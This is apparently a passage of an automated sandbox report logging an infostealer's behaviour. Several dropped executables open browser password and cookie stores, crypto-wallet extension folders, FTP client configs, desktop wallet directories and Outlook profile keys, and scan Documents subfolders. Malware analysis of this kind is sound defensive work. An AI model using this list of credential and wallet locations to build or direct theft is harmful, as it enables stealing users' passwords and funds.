                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.db
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.db
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.db
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.db
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.db
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.db
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.db
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDI
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDI
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
